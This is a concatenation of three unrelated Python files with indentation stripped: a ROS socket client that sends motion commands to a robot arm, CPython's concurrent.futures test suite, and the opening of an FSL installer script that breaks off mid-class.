# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
#rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more revelant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
test.support.import_module('threading')
from test.script_helper import assert_python_ok
import os
import sys
import threading
import time
import unittest
import weakref
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future)
from concurrent.futures.process import BrokenProcessPool
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
def mul(x, y):
return x * y
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
class MyObject(object):
def my_method(self):
pass
class ExecutorMixin:
worker_count = 5
def setUp(self):
self.t1 = time.time()
try:
self.executor = self.executor_type(max_workers=self.worker_count)
except NotImplementedError as e:
self.skipTest(str(e))
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
dt = time.time() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 60, "synchronization issue: test lasted too long")
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
t = {executor_type}(5)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._threads), 3)
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
class ProcessPoolShutdownTest(ProcessPoolMixin, ExecutorShutdownTest, unittest.TestCase):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
del executor
queue_management_thread.join()
for p in processes.values():
p.join()
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5)
future3 = self.executor.submit(time.sleep, 3)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, unittest.TestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
class ProcessPoolWaitTests(ProcessPoolMixin, WaitTests, unittest.TestCase):
pass
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
future1 = self.executor.submit(time.sleep, 2)
completed = [f for f in futures.as_completed([future1,future1])]
self.assertEqual(len(completed), 1)
class ThreadPoolAsCompletedTests(ThreadPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ProcessPoolAsCompletedTests(ProcessPoolMixin, AsCompletedTests, unittest.TestCase):
pass
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, unittest.TestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
self.assertEqual(executor._max_workers,
(os.cpu_count() or 1) * 5)
class ProcessPoolExecutorTest(ProcessPoolMixin, ExecutorTest, unittest.TestCase):
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
class FutureTests(unittest.TestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependant.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependant.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
@test.support.reap_threads
def test_main():
try:
test.support.run_unittest(__name__)
finally:
test.support.reap_children()
if __name__ == "__main__":
test_main()
|
fslinstaller.py
|
#!/usr/bin/python
# Handle unicode encoding
import csv
import errno
import getpass
import itertools
import locale
import os
import platform
import threading
import time
import shlex
import socket
import sys
import tempfile
import urllib2
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from re import compile, escape, sub
from subprocess import Popen, call, PIPE, STDOUT
try:
from subprocess import DEVNULL # py3k
except ImportError:
DEVNULL = open(os.devnull, 'wb')
locale.setlocale(locale.LC_ALL, '')
code = locale.getpreferredencoding()
try:
import json
HAS_JSON = True
except:
HAS_JSON = False
fsli_C_FAILED = 1
fsli_C_OK = 2
fsli_C_SKIP = 4
fsli_C_WARN = 3
CURRENT = 0
UPDATE = 1
UPGRADE = 2
class Version(object):
def __init__(self, version_string):
v_vals = version_string.split('.')
for v in v_vals:
if not v.isdigit():
raise ValueError('Bad version string')
self.major = int(v_vals[0])
try:
self.minor = int(v_vals[1])
except IndexError:
self.minor = 0
try:
self.patch = int(v_vals[2])
except IndexError:
self.patch = 0
try:
self.hotfix = int(v_vals[3])
except IndexError:
self.hotfix = 0
def __repr__(self):
return "Version(%s,%s,%s,%s)" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __str__(self):
if self.hotfix == 0:
return "%s.%s.%s" % (self.major, self.minor, self.patch)
else:
return "%s.%s.%s.%s" % (
self.major,
self.minor,
self.patch,
self.hotfix)
def __ge__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self > other or self == other:
return True
return False
def __le__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self < other or self == other:
return True
return False
def __cmp__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__lt__(other):
return -1
if self.__gt__(other):
return 1
return 0
def __lt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major < other.major:
return True
if self.major > other.major:
return False
if self.minor < other.minor:
return True
if self.minor > other.minor:
return False
if self.patch < other.patch:
return True
if self.patch > other.patch:
return False
if self.hotfix < other.hotfix:
return True
if self.hotfix > other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __gt__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.major > other.major:
return True
if self.major < other.major:
return False
if self.minor > other.minor:
return True
if self.minor < other.minor:
return False
if self.patch > other.patch:
return True
if self.patch < other.patch:
return False
if self.hotfix > other.hotfix:
return True
if self.hotfix < other.hotfix:
return False
# major, minor and patch all match so this is not less than
return False
def __eq__(self, other):
if not isinstance(other, Version):
return NotImplemented
if (
self.major == other.major and
self.minor == other.minor and
self.patch == other.patch and
self.hotfix == other.hotfix):
return True
return False
def __ne__(self, other):
if not isinstance(other, Version):
return NotImplemented
if self.__eq__(other):
return False
return True
version = Version('3.0.10')
def memoize(f, cache={}):
def g(*args, **kwargs):
key = (f, tuple(args), frozenset(kwargs.items()))
if key not in cache:
cache[key] = f(*args, **kwargs)
return cache[key]
return g
class InstallError(Exception):
pass
class shell_colours(object):
default = '\033[0m'
rfg_kbg = '\033[91m'
gfg_kbg = '\033[92m'
yfg_kbg = '\033[93m'
mfg_kbg = '\033[95m'
yfg_bbg = '\033[104;93m'
bfg_kbg = '\033[34m'
bold = '\033[1m'
class MsgUser(object):
__debug = False
__quiet = False
@classmethod
def debugOn(cls):
cls.__debug = True
@classmethod
def debugOff(cls):
cls.__debug = False
@classmethod
def quietOn(cls):
cls.__quiet = True
@classmethod
def quietOff(cls):
cls.__quiet = False
@classmethod
def isquiet(cls):
return cls.__quiet
@classmethod
def isdebug(cls):
return cls.__debug
@classmethod
def debug(cls, message, newline=True):
if cls.__debug:
mess = str(message)
if newline:
mess += "\n"
sys.stderr.write(mess)
@classmethod
def message(cls, msg):
if cls.__quiet:
return
print msg
@classmethod
def question(cls, msg):
print msg,
@classmethod
def skipped(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.mfg_kbg, "[Skipped] ", shell_colours.default, msg))
@classmethod
def ok(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.gfg_kbg, "[OK] ", shell_colours.default, msg))
@classmethod
def failed(cls, msg):
print "".join(
(shell_colours.rfg_kbg, "[FAILED] ", shell_colours.default, msg))
@classmethod
def warning(cls, msg):
if cls.__quiet:
return
print "".join(
(shell_colours.bfg_kbg,
shell_colours.bold,
"[Warning]",
shell_colours.default, " ", msg))
class Progress_bar(object):
def __init__(self, x=0, y=0, mx=1, numeric=False, percentage=False):
self.x = x
self.y = y
self.width = 50
self.current = 0
self.max = mx
self.numeric = numeric
self.percentage = percentage
def update(self, reading):
if MsgUser.isquiet():
return
percent = int(round(reading * 100.0 / self.max))
cr = '\r'
if not self.numeric and not self.percentage:
bar = '#' * int(percent)
elif self.numeric:
bar = "/".join(
(str(reading),
str(self.max))) + ' - ' + str(percent) + "%\033[K"
elif self.percentage:
bar = "%s%%" % (percent)
sys.stdout.write(cr)
sys.stdout.write(bar)
sys.stdout.flush()
self.current = percent
if percent == 100:
sys.stdout.write(cr)
if not self.numeric and not self.percentage:
sys.stdout.write(" " * int(percent))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.numeric:
sys.stdout.write(" " * (len(str(self.max))*2 + 8))
sys.stdout.write(cr)
sys.stdout.flush()
elif self.percentage:
sys.stdout.write("100%")
sys.stdout.write(cr)
sys.stdout.flush()
def temp_file_name(mode='r', close=False):
'''Return a name for a temporary file - uses mkstemp to create the file and
returns a tuple (file object, file name).
Opens as read-only unless mode specifies otherwise. If close is set to True
will close the file before returning.
The file object is a fdopen file object so lacks a useable file name.'''
(tmpfile, fname) = tempfile.mkstemp()
file_obj = os.fdopen(tmpfile, mode)
if close:
file_obj.close()
return (file_obj, fname)
class RunCommandError(Exception):
pass
class Spinner(object):
spinner = itertools.cycle(('-', '\\', '|', '/', ))
busy = False
delay = 0.2
def __init__(self, delay=None, quiet=False):
